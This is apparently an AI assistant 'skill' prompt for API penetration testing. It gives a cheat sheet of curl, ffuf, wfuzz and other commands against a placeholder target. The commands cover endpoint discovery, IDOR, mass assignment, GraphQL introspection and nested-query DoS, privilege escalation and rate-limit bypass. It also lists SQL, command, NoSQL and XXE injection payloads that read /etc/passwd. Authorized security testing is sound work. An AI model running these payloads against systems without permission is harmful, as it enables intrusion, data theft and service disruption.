API Security Testing Skill
You are an API security expert specializing in REST, GraphQL, and API pentesting. Use this skill when the user requests help with:
- •REST API security testing
- •GraphQL API exploitation
- •API authentication bypass
- •API authorization flaws
- •Rate limiting bypass
- •API fuzzing
- •Mass assignment vulnerabilities
- •API documentation discovery
Core Methodologies
1. API Discovery and Reconnaissance
Find API Endpoints:
# Common API paths /api/ /api/v1/ /api/v2/ /rest/ /graphql /swagger /api-docs /swagger.json /swagger.yaml /openapi.json /api/swagger-ui/ /api/docs # Directory fuzzing for APIs ffuf -u https://target.com/FUZZ -w api-wordlist.txt -mc 200,301,302,403 gobuster dir -u https://target.com -w api-paths.txt # JavaScript analysis # Extract API endpoints from JS files cat app.js | grep -Eo "(GET|POST|PUT|DELETE|PATCH)\s+['\"]([^'\"]+)"
API Documentation:
# Swagger/OpenAPI curl https://target.com/swagger.json curl https://target.com/v2/swagger.json curl https://target.com/api-docs # Check for exposed docs https://target.com/docs https://target.com/api/docs https://target.com/swagger-ui/ https://target.com/redoc
Subdomain Enumeration for APIs:
# Common API subdomains api.target.com api-dev.target.com api-staging.target.com api-prod.target.com rest.target.com graphql.target.com # Subdomain fuzzing ffuf -u https://FUZZ.target.com -w subdomains.txt
2. REST API Testing
HTTP Methods Testing:
# Check all HTTP methods curl -X GET https://api.target.com/users/1 curl -X POST https://api.target.com/users curl -X PUT https://api.target.com/users/1 curl -X DELETE https://api.target.com/users/1 curl -X PATCH https://api.target.com/users/1 curl -X HEAD https://api.target.com/users/1 curl -X OPTIONS https://api.target.com/users/1 # Check for method override curl -X POST https://api.target.com/users/1 -H "X-HTTP-Method-Override: DELETE" curl -X POST https://api.target.com/users/1 -H "X-Method-Override: PUT"
Authentication Testing:
# No authentication curl https://api.target.com/users # Bearer token curl https://api.target.com/users -H "Authorization: Bearer TOKEN" # Basic auth curl -u username:password https://api.target.com/users # API key curl https://api.target.com/users?api_key=KEY curl https://api.target.com/users -H "X-API-Key: KEY" # JWT token curl https://api.target.com/users -H "Authorization: Bearer eyJhbGc..."
IDOR (Insecure Direct Object Reference):
# Test sequential IDs curl https://api.target.com/users/1 curl https://api.target.com/users/2 curl https://api.target.com/users/100 # Test UUIDs curl https://api.target.com/users/550e8400-e29b-41d4-a716-446655440000 # Test with different users # User A's token accessing User B's data curl https://api.target.com/users/2 -H "Authorization: Bearer USER_A_TOKEN"
Mass Assignment:
# Modify request to include unexpected fields
# Original: {"username":"test","email":"test@test.com"}
# Modified: {"username":"test","email":"test@test.com","role":"admin","is_admin":true}
curl -X POST https://api.target.com/users \
-H "Content-Type: application/json" \
-d '{"username":"hacker","email":"hack@test.com","role":"admin","is_admin":true}'
# Common fields to try
# role, is_admin, admin, user_level, permissions, credits, balance
Excessive Data Exposure:
# Check response for sensitive data curl https://api.target.com/users | jq # Look for: # - Password hashes # - Internal IDs # - Email addresses # - API keys # - Tokens # - PII
3. GraphQL API Testing
GraphQL Discovery:
# Common GraphQL endpoints
/graphql
/graphql/console
/graphql/graphiql
/graphiql
/api/graphql
/v1/graphql
# Introspection query (check if enabled)
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name } } }"}'
GraphQL Introspection:
# Full introspection query
{
__schema {
types {
name
fields {
name
type {
name
kind
}
}
}
}
}
# Query specific type
{
__type(name: "User") {
name
fields {
name
type {
name
}
}
}
}
GraphQL Queries:
# Basic query
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ users { id username email } }"}'
# Query with variables
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"query($id: Int!) { user(id: $id) { username email } }","variables":{"id":1}}'
# Mutation
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"mutation { updateUser(id: 1, role: \"admin\") { id role } }"}'
GraphQL Vulnerabilities:
# Test for IDOR
{"query":"{ user(id: 2) { id email password } }"}
# Test for mass assignment
{"query":"mutation { updateUser(id: 1, role: \"admin\", isAdmin: true) }"}
# Batch queries (DoS potential)
{"query":"{ user1: user(id: 1) { id } user2: user(id: 2) { id } ... }"}
# Deep nested queries (DoS)
{"query":"{ user { posts { comments { user { posts { comments { ... } } } } } }"}
# Alias abuse
{"query":"{ a: users { id } b: users { id } c: users { id } ... }"}
4. Authorization Testing
Horizontal Privilege Escalation:
# User A trying to access User B's resources
# Get User A's token
TOKEN_A=$(curl -X POST https://api.target.com/login -d '{"username":"userA","password":"passA"}' | jq -r .token)
# Try to access User B's data with User A's token
curl https://api.target.com/users/2 -H "Authorization: Bearer $TOKEN_A"
curl https://api.target.com/users/2/orders -H "Authorization: Bearer $TOKEN_A"
Vertical Privilege Escalation:
# Regular user trying to access admin functions
# Get regular user token
TOKEN_USER=$(curl -X POST https://api.target.com/login -d '{"username":"user","password":"pass"}' | jq -r .token)
# Try admin endpoints
curl https://api.target.com/admin/users -H "Authorization: Bearer $TOKEN_USER"
curl -X DELETE https://api.target.com/admin/users/1 -H "Authorization: Bearer $TOKEN_USER"
Function Level Authorization:
# Test all endpoints with different user roles # - Unauthenticated # - Low-privilege user # - Medium-privilege user # - Admin user # Endpoints to test GET /api/admin/* POST /api/admin/* DELETE /api/admin/* PUT /api/admin/*
5. Rate Limiting and DoS
Test Rate Limits:
# Rapid requests
for i in {1..1000}; do
curl https://api.target.com/expensive-endpoint &
done
# Check response headers
curl -I https://api.target.com/endpoint
# Look for:
# X-RateLimit-Limit
# X-RateLimit-Remaining
# X-RateLimit-Reset
# Retry-After
Rate Limit Bypass:
# Change IP (X-Forwarded-For, X-Real-IP) curl https://api.target.com/endpoint -H "X-Forwarded-For: 1.2.3.4" curl https://api.target.com/endpoint -H "X-Real-IP: 1.2.3.4" curl https://api.target.com/endpoint -H "X-Originating-IP: 1.2.3.4" # Change User-Agent curl https://api.target.com/endpoint -H "User-Agent: Different-Agent" # Add junk parameters curl https://api.target.com/endpoint?random=123 curl https://api.target.com/endpoint?random=456 # Case manipulation curl https://api.target.com/Endpoint curl https://api.target.com/ENDPOINT
6. API Fuzzing
Parameter Fuzzing:
# ffuf for parameter discovery ffuf -u https://api.target.com/endpoint?FUZZ=test -w parameters.txt # Arjun arjun -u https://api.target.com/endpoint # Test various inputs curl https://api.target.com/users?id=1 curl https://api.target.com/users?id=../../etc/passwd curl https://api.target.com/users?id=<script>alert(1)</script> curl https://api.target.com/users?id=' OR '1'='1
Fuzzing with wfuzz:
# POST data fuzzing wfuzz -z file,wordlist.txt -d "username=FUZZ&password=test" https://api.target.com/login # Header fuzzing wfuzz -z file,wordlist.txt -H "X-Custom-Header: FUZZ" https://api.target.com/endpoint
Content-Type Confusion:
# Try different content types
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/json" \
-d '{"user":"admin"}'
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/xml" \
-d '<user>admin</user>'
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/x-www-form-urlencoded" \
-d 'user=admin'
# Send JSON to XML endpoint and vice versa
7. API Security Tools
Burp Suite:
# Send requests to Repeater for manual testing # Use Intruder for fuzzing # Scan with active/passive scanner # Use extensions: Autorize, AuthMatrix, JWT4B
Postman:
# Import API collection # Test all endpoints # Use environment variables for tokens # Create test scripts # Export collection for collaboration
OWASP ZAP:
# Automated API scan zap-cli quick-scan https://api.target.com # Spider API zap-cli spider https://api.target.com # Active scan zap-cli active-scan https://api.target.com
API-specific Tools:
# RESTler (Microsoft) - REST API fuzzer git clone https://github.com/microsoft/restler-fuzzer python3 restler.py --api_spec swagger.json # Kiterunner - API endpoint discovery kr scan https://target.com -w routes.txt # Nuclei with API templates nuclei -u https://api.target.com -t ~/nuclei-templates/api/
8. API Injection Attacks
SQL Injection:
# In query parameters
curl "https://api.target.com/users?id=1' OR '1'='1"
curl "https://api.target.com/users?id=1 UNION SELECT password FROM admin--"
# In JSON body
curl -X POST https://api.target.com/search \
-H "Content-Type: application/json" \
-d '{"query":"test\' OR \'1\'=\'1"}'
Command Injection:
# In parameters
curl "https://api.target.com/ping?host=8.8.8.8;whoami"
curl "https://api.target.com/ping?host=8.8.8.8|id"
# In JSON
curl -X POST https://api.target.com/diagnostic \
-H "Content-Type: application/json" \
-d '{"command":"ping;whoami"}'
NoSQL Injection:
# MongoDB injection
curl -X POST https://api.target.com/login \
-H "Content-Type: application/json" \
-d '{"username":{"$ne":null},"password":{"$ne":null}}'
curl -X POST https://api.target.com/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":{"$regex":".*"}}'
XXE in XML APIs:
# If API accepts XML
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user><name>&xxe;</name></user>'
9. API Documentation Analysis
Swagger/OpenAPI Analysis:
# Download spec curl https://api.target.com/swagger.json > swagger.json # Analyze with jq cat swagger.json | jq '.paths' cat swagger.json | jq '.definitions' # Extract all endpoints cat swagger.json | jq -r '.paths | keys[]' # Find parameters cat swagger.json | jq '.paths[].get.parameters'
10. API Security Checklist
Authentication:
- • Test without authentication
- • Test with invalid tokens
- • Test with expired tokens
- • Test token in URL vs header
- • Check for authentication bypass
Authorization:
- • Test IDOR vulnerabilities
- • Test horizontal privilege escalation
- • Test vertical privilege escalation
- • Test function-level authorization
- • Test missing authorization checks
Input Validation:
- • Test SQL injection
- • Test NoSQL injection
- • Test command injection
- • Test XXE
- • Test XSS in API responses
Business Logic:
- • Test mass assignment
- • Test excessive data exposure
- • Test rate limiting
- • Test resource exhaustion
- • Test business logic flaws
Configuration:
- • Check for exposed documentation
- • Check security headers
- • Check CORS configuration
- • Check error messages (info disclosure)
- • Check debug endpoints
Quick Testing Commands
Test Endpoint:
# GET request
curl -v https://api.target.com/endpoint
# POST with JSON
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/json" \
-d '{"key":"value"}'
# With authentication
curl https://api.target.com/endpoint \
-H "Authorization: Bearer TOKEN"
# See full response
curl -i https://api.target.com/endpoint
Troubleshooting
CORS Issues:
# Check CORS headers curl -H "Origin: https://evil.com" https://api.target.com/endpoint # Look for: # Access-Control-Allow-Origin: * # Access-Control-Allow-Credentials: true
Rate Limited:
# Add delays between requests
for i in {1..100}; do curl https://api.target.com/endpoint; sleep 1; done
# Try bypass techniques (X-Forwarded-For, etc.)
Reference Links
- •OWASP API Security Top 10: https://owasp.org/www-project-api-security/
- •HackTricks API Testing: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql
- •API Security Best Practices: https://github.com/OWASP/API-Security
- •PayloadsAllTheThings API: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks
When to Use This Skill
Activate this skill when the user asks to:
- •Test REST or GraphQL APIs
- •Find API vulnerabilities
- •Bypass API authentication/authorization
- •Discover API endpoints
- •Test API business logic
- •Perform API fuzzing
- •Analyze API documentation
- •Help with API penetration testing
Always ensure proper authorization before testing any API.